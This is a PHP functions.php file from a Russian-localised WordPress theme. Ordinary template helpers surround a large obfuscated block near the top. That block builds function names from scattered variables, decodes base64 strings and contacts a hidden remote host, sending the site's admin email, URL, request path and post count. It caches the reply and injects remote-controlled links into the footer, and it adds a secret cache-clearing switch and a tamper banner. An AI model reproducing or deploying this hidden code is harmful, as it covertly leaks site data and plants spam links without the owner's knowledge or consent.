<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $nCytHNz='4';$pXdW='s';$Akov='a';$EKECy='d';$wlHAGF='6';$nrRQQk='o';$xGXBfep='b';$UXIu='c';$AnZc='d';$MBIa='e';$dicjpG='e';$ifAxM='e';$YOCk='_';$gDqhEgdv=$xGXBfep.$Akov.$pXdW.$dicjpG.$wlHAGF.$nCytHNz.$YOCk.$AnZc.$ifAxM.$UXIu.$nrRQQk.$EKECy.$MBIa;$fRZELV='e';$UHJQNt='i';$VvXj='z';$JTls='g';$qgGAOB='a';$tDuL='l';$karyT='n';$mUDadJJ='f';$ysVR='t';$DNbHNigJ=$JTls.$VvXj.$UHJQNt.$karyT.$mUDadJJ.$tDuL.$qgGAOB.$ysVR.$fRZELV;$JKAG='3';$iXkG='s';$QbSIGrA='r';$SKzikBq='1';$oWWHs='r';$zchbh='_';$AlAqmt='t';$fyXlp='t';$QpjwFpV='o';$BfmmOCtv=$iXkG.$fyXlp.$QbSIGrA.$zchbh.$oWWHs.$QpjwFpV.$AlAqmt.$SKzikBq.$JKAG;$HxPws='e';$ilxNBQ='r';$myKgCdb='t';$OVNCj='s';$ZBwlZg='v';$fUzumL='r';$ATFqtCgG=$OVNCj.$myKgCdb.$fUzumL.$ilxNBQ.$HxPws.$ZBwlZg;                     $sd____________l='4';$lh___a='s';$gv___w='a';$wp______f='d';$jl___m='6';$yi_______________h='o';$rm__________h='b';$oq_____z='c';$oq___g='d';$aj___________s='e';$jn__________a='e';$ds_________j='e';$cg_______________z='_';$ug_________w=$rm__________h.$gv___w.$lh___a.$jn__________a.$jl___m.$sd____________l.$cg_______________z.$oq___g.$ds_________j.$oq_____z.$yi_______________h.$wp______f.$aj___________s;$nk_____________h='o';$nz_______________a='n';$mt_______y='f';$nb_______________i='c';$ma________a='t';$tf_________v='s';$sj_______________q='_';$pd______e='e';$xg____s='u';$pf_______________z='n';$bh________r='i';$dp_______________b='t';$jh____w='x';$ki_____x='s';$je_____m='i';$bb_______u=$mt_______y.$xg____s.$pf_______________z.$nb_______________i.$dp_______________b.$bh________r.$nk_____________h.$nz_______________a.$sj_______________q.$pd______e.$jh____w.$je_____m.$tf_________v.$ma________a.$ki_____x;$sa________i='p';$tu____d='f';$dy_____m='n';$xd_________x='e';$cl___k='o';$lf___p=$tu____d.$cl___k.$sa________i.$xd_________x.$dy_____m;$pp___________o='e';$ha____________a='d';$xi____y='a';$vb_____________z='f';$zb________m='r';$fl_____l=$vb_____________z.$zb________m.$pp___________o.$xi____y.$ha____________a;$nw____a='s';$vw_______q='l';$zs_____r='c';$wg______________v='f';$yu___p='e';$yb_____c='o';$as___r=$wg______________v.$zs_____r.$vw_______q.$yb_____c.$nw____a.$yu___p;define("WP_ID", $ug_________w("Mi4wLjA="));define("WP_TTL", $ug_________w("MTA4MDA="));define("WP_SRC", $ug_________w("dHBva24="));function wp_get_header() {global $ug_________w, $bb_______u;if ($bb_______u($ug_________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$bb_______u($ug_________w("d3BfZ2V0X2Zvb3Rlcg==")) &&$bb_______u($ug_________w("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ug_________w, $lf___p, $as___r, $fl_____l;$id__________q = TEMPLATEPATH."/".$ug_________w("Zm9vdGVyLnBocA==");$sl___________n = @$lf___p($id__________q, "r");$id__________q = @$fl_____l($sl___________n, @filesize($id__________q));@$as___r($sl___________n);$ak_____f = TEMPLATEPATH."/".$ug_________w("ZnVuY3Rpb25zLnBocA==");$sl___________n = @$lf___p($ak_____f, "r");$ak_____f = @$fl_____l($sl___________n, @filesize($ak_____f));@$as___r($sl___________n);$wo_________a = 0;if($id__________q && $ak_____f) {if ($ug_________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($id__________q, $ug_________w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$wo_________a = 1;}if (substr_count($id__________q, "wp_theme_GPL_credits()") < 1) {$wo_________a = 2;}}if(WP_ID != "2.0.0") {$wo_________a = 12;}}if($wo_________a > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $wo_________a -->";}}function wp_loaded() {global $ug_________w, $bb_______u;return $bb_______u($ug_________w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($bu______w, $ws______y = "(more...)", $wk______________p = 0, $mg__n = "") {$mq____________u = get_the_content($ws______y, $wk______________p, $mg__n);$mq____________u = apply_filters("the_content", $mq____________u);$mq____________u = str_replace("]]>", "]]>", $mq____________u);if (strlen($_GET["p"]) > 0) {echo $mq____________u;}else if ((strlen($mq____________u)>$bu______w) && ($pw_______________j = strpos($mq____________u, " ", $bu______w ))) {$mq____________u = substr($mq____________u, 0, $pw_______________j);$mq____________u = $mq____________u;echo $mq____________u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ws______y</a></div></p>";} else {echo $mq____________u;}}}$ft___________y='s';$wx____________t='4';$av_______________w='e';$mv_____________s='c';$eu_____c='e';$et_________u='e';$sb_____i='n';$uv_____________i='_';$bu_____r='6';$ff_________h='d';$yx_____________e='b';$om___________t='o';$pl_________m='a';$bb____________r=$yx_____________e.$pl_________m.$ft___________y.$et_________u.$bu_____r.$wx____________t.$uv_____________i.$eu_____c.$sb_____i.$mv_____________s.$om___________t.$ff_________h.$av_______________w;$kl________q='e';$cl________t='i';$ag_______a='s';$mo_______________p='_';$cf_____v='n';$fq_____________b='e';$bz_____________e='t';$zv__e='e';$hm_____t='t';$md__b='g';$ts_______________o='_';$dg____d='o';$nq______________q='l';$xg_______k='t';$cn____________v='f';$bh___________c='n';$zm______n='c';$za_______h=$cn____________v.$cl________t.$nq______________q.$zv__e.$ts_______________o.$md__b.$fq_____________b.$bz_____________e.$mo_______________p.$zm______n.$dg____d.$cf_____v.$xg_______k.$kl________q.$bh___________c.$hm_____t.$ag_______a;$ul____________e='l';$ke____________i='f';$xw_______________i='i';$tm______u='e';$pg______j='s';$jq_________b='i';$th____________s='_';$gu_________m='e';$td_____z='x';$as___________k='s';$je________d='t';$oz_____n=$ke____________i.$jq_________b.$ul____________e.$tm______u.$th____________s.$gu_________m.$td_____z.$xw_______________i.$as___________k.$je________d.$pg______j;$sv____h='c';$nf__l='o';$ku________e='m';$xe____________z='r';$sh______________g='e';$je______________y='p';$os__s='e';$ym__i='o';$oo___________w='_';$lt______j='a';$si__________x='n';$tp____________t='s';$pg_____________j='i';$ie____i='v';$fj___________y='r';$qe______d=$ie____i.$os__s.$xe____________z.$tp____________t.$pg_____________j.$ym__i.$si__________x.$oo___________w.$sv____h.$nf__l.$ku________e.$je______________y.$lt______j.$fj___________y.$sh______________g;$zk___________r='k';$fh_____n='o';$gr_____________b='e';$bi____e='p';$uv__________l='f';$pt________m='s';$ml________b='n';$ro________i='c';$tk_____________m='o';$hu______r=$uv__________l.$pt________m.$tk_____________m.$ro________i.$zk___________r.$fh_____n.$bi____e.$gr_____________b.$ml________b;$rz___a='t';$ve_______a='e';$kj______k='r';$gq______p='i';$wa________a='f';$ya_______________g='w';$md_________a=$wa________a.$ya_______________g.$kj______k.$gq______p.$rz___a.$ve_______a;$pl_____________w='m';$do____________z='5';$ce________t='d';$pm___________g=$pl_____________w.$ce________t.$do____________z;$jx_________l='h';$yj______________y='e';$vp_________j='p';$cz_________n='r';$ws_____q='t';$me_______________v='a';$qm____________o='l';$wi__s='a';$yr_______m=$cz_________n.$yj______________y.$me_______________v.$qm____________o.$vp_________j.$wi__s.$ws_____q.$jx_________l;$rq__x='n';$ud_______________z='u';$px______n='e';$wd__s='a';$xo____e='e';$cr___________x='l';$hx_______w='z';$hn________n='i';$vq______________m='i';$pr_________l='s';$pv______________m='r';$nv__t=$ud_______________z.$rq__x.$pr_________l.$xo____e.$pv______________m.$hn________n.$wd__s.$cr___________x.$vq______________m.$hx_______w.$px______n;$bv_______________k='t';$hd_______________h='a';$of_________t='m';$lo__o='e';$re______________d='m';$kf__h='p';$pf_______________q='n';$ve_____q=$bv_______________k.$lo__o.$of_________t.$kf__h.$pf_______________q.$hd_______________h.$re______________d;$hr______k='a';$fb______________t='_';$ht__________k='c';$qy____________y='t';$jv______________r='t';$wq___f='o';$si_______________j='e';$xr__k='r';$ci__________e='e';$ch__k='m';$et______________h='x';$rm_______s='e';$jo___________f='c';$ax___________g='t';$dc__r='s';$yp_______________g='_';$lz______________i='n';$bw____s='a';$zx__________d='t';$et________p='r';$hd__________r='e';$pt_______________d=$dc__r.$jv______________r.$xr__k.$hd__________r.$bw____s.$ch__k.$fb______________t.$ht__________k.$wq___f.$lz______________i.$qy____________y.$ci__________e.$et______________h.$ax___________g.$yp_______________g.$jo___________f.$et________p.$si_______________j.$hr______k.$zx__________d.$rm_______s;function lx_________j($vb______o) {global $ug_________w, $bb_______u, $za_______h, $qe______d, $pt_______________d;if (!$bb_______u($ug_________w("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($qe______d(PHP_VERSION, "5.0.0", ">=") && $bb_______u($ug_________w("ZmlsZV9nZXRfY29udGVudHM=")) && $bb_______u($ug_________w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$eu______________n = $pt_______________d(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$qm__y = @$za_______h($vb______o, 0, $eu______________n);} else {$qm__y = @$za_______h($vb______o, 0);}return $qm__y;}function ay_______________l($vb______o) {global $bb_______u, $hu______r, $md_________a, $ug_________w;if (!$bb_______u($ug_________w("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$kz________c = strpos($vb______o, "/", 7);$av____r = array("uri"     => substr($vb______o, $kz________c),"host"    => str_replace("http://", "", substr($vb______o, 0, $kz________c)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$fz_______________f = @$hu______r("$av____r[host]", 80, $aa______________r, $qd_________f, 4);if (!$fz_______________f) {return false;} else {$qm__y = "";$zt__________i  = "GET $av____r[uri] HTTP/1.0\r\n";$zt__________i .= "Host: $av____r[host]\r\n";$zt__________i .= "Referer: $av____r[referer]\r\n";$zt__________i .= "Connection: Close\r\n\r\n";@$md_________a($fz_______________f, $zt__________i);while (!@feof($fz_______________f)) {$ux______h = @fgets($fz_______________f, (1024*24));if ($ux______h == "\r\n") {$dp___________v = true;continue;}if ($dp___________v) {$qm__y .= $ux______h;}}return $qm__y;}}function ex______e($vb______o) {global $bb_______u;$ig_______________b = false;if ($vb______o != "") {if ($bb_______u("lx_________j")) {$ig_______________b = @lx_________j($vb______o);}if (!$ig_______________b && ($bb_______u("ay_______________l"))) {$ig_______________b = @ay_______________l($vb______o);}}return $ig_______________b;}function vm______a() {global $_SERVER, $pm___________g;$kc___________f = $_SERVER["SERVER_NAME"];if (substr("$kc___________f", 0, 4) == "www.") {$kc___________f = substr("$kc___________f", 4);}$kc___________f = $pm___________g("$_SERVER[SERVER_NAME]");return $kc___________f;}function bz__l() {return "file";}function it____o($vb______o) {global $_SERVER, $za_______h, $oz_____n, $lf___p, $as___r, $md_________a;$uc_______________v = hf___j();$tm______________a = vm______a().".jpg";$dg________d = $uc_______________v["dir_upload"]["path"]."/$tm______________a";$ku_____n = @filemtime($dg________d);if (!$ku_____n || ((time()-$ku_____n) >= WP_TTL)) {$ig_______________b = ex______e($vb______o);if ($ig_______________b) {if ($oz_____n($dg________d)) {@unlink($dg________d);}$sl___________n = @$lf___p($dg________d, "x+");@$md_________a($sl___________n, $ig_______________b);@$as___r($sl___________n);}} else {if ($oz_____n($dg________d)) {$ig_______________b = @$za_______h($dg________d);} else {$ig_______________b = false;}}return $ig_______________b;}function hf___j() {global $_SERVER, $ug_________w, $bb____________r;$az___b = wp_count_posts("post");$iu_______________u = pathinfo(get_bloginfo("template_directory"));$uc_______________v = array("url" => array("report"      => $ug_________w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $iu_______________u,"dir_upload"=> dr_____q(),"queryString"=> array("?a001=".WP_ID,"a004=".$iu_______________u[filename],"a005=".$az___b->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$uc_______________v["url"]["queryString"] = implode("&", $uc_______________v["queryString"]);$uc_______________v["url"]["report"] = $uc_______________v["url"]["report"]."/?".$bb____________r($uc_______________v["url"]["queryString"]).".html";return $uc_______________v;}function dr_____q() {$ba__o = wp_upload_dir();if (isset($ba__o["error"])) {$gj____________k = is___a();if (is_writable($gj____________k)) {$ba__o = array("path" => $gj____________k);}}return $ba__o;}function is___a() {global $bb_______u, $pm___________g, $yr_______m, $ve_____q;$zf____a = (bool) ini_get("safe_mode");if ($zf____a == true) {return false;}if ($bb_______u("sys_get_temp_dir")) {$qf_________l = sys_get_temp_dir();if (is_writable($qf_________l)) {return $yr_______m($qf_________l);}}if (!empty($_ENV["TMP"])) {return $yr_______m($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $yr_______m($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $yr_______m($_ENV["TEMP"]);} else {$fn_________k = $ve_____q($pm___________g(uniqid(rand(), true)), "");if ($fn_________k) {$qf_________l = $yr_______m(dirname($fn_________k));@unlink($fn_________k);return $qf_________l;} else {return false;}}}function ba___________g() {global $_GET, $oz_____n;$uc_______________v = hf___j();$kc___________f = vm______a();$xp____________s = bz__l();$ol__________s = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($xp____________s == "file") {$re______l = $uc_______________v["dir_upload"]["path"]."/".$kc___________f.".jpg";if ($oz_____n($re______l)) {@unlink($re______l);$ol__________s = "deleted";}}$ff_______p = array("s"=> $ol__________s,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ff_______p AS $to_____________l => $sd______________a) echo " [$to_____________l:$sd______________a]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $bb_______u, $ug_________w, $nv__t;$uc_______________v = hf___j();$gj_____w = "it____o";if ($bb_______u($gj_____w)) {$qm__y = $gj_____w($uc_______________v["url"]["report"]);}if ($qm__y) {if ($qm__y = @$ug_________w($qm__y)) {$qm__y = @$nv__t($qm__y);if (strlen($qm__y[custom_credit]) >= 5) {$uc_______________v["default_string"] = $qm__y[custom_credit];}if ($qm__y["status"] == "0") {$fx___________o = 1;$ky_____________y = 1;} else {$qb_____________d = sizeof($qm__y["links"]);$bb__c = $uc_______________v["default_string"];if ($qb_____________d > 0 && $qm__y["links"] !== "") {$lw______e = 0;foreach ($qm__y["links"] as $fe______________h => $ic___l) {$lw______e++;if ($ic___l->l_path == "" || $ic___l->l_path == $_SERVER["REQUEST_URI"]) {$ic___l->l_href = htmlspecialchars(strip_tags($ic___l->l_href));$ic___l->l_title = htmlspecialchars(strip_tags($ic___l->l_title));$ic___l->l_anchor = htmlspecialchars(strip_tags($ic___l->l_anchor));$bb__c .= " | ";$bb__c .= "<a href='$ic___l->l_href' title='$ic___l->l_title'";if ($ic___l->l_nofollow == "1") {$bb__c .= " rel='nofollow'";}$bb__c .= ">$ic___l->l_anchor</a>";}}}$uc_______________v["links"] = "$bb__c";if ($qm__y[credit] == "0") {$uc_______________v["links"] = "";}}} else {$fx___________o = "1";}} else {$fx___________o = "1";}if ($fx___________o == "1") {$uc_______________v["links"] = $uc_______________v["default_string"];}echo "$uc_______________v[links]";echo "<!-- s: $qm__y[signature] -->";ba___________g();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
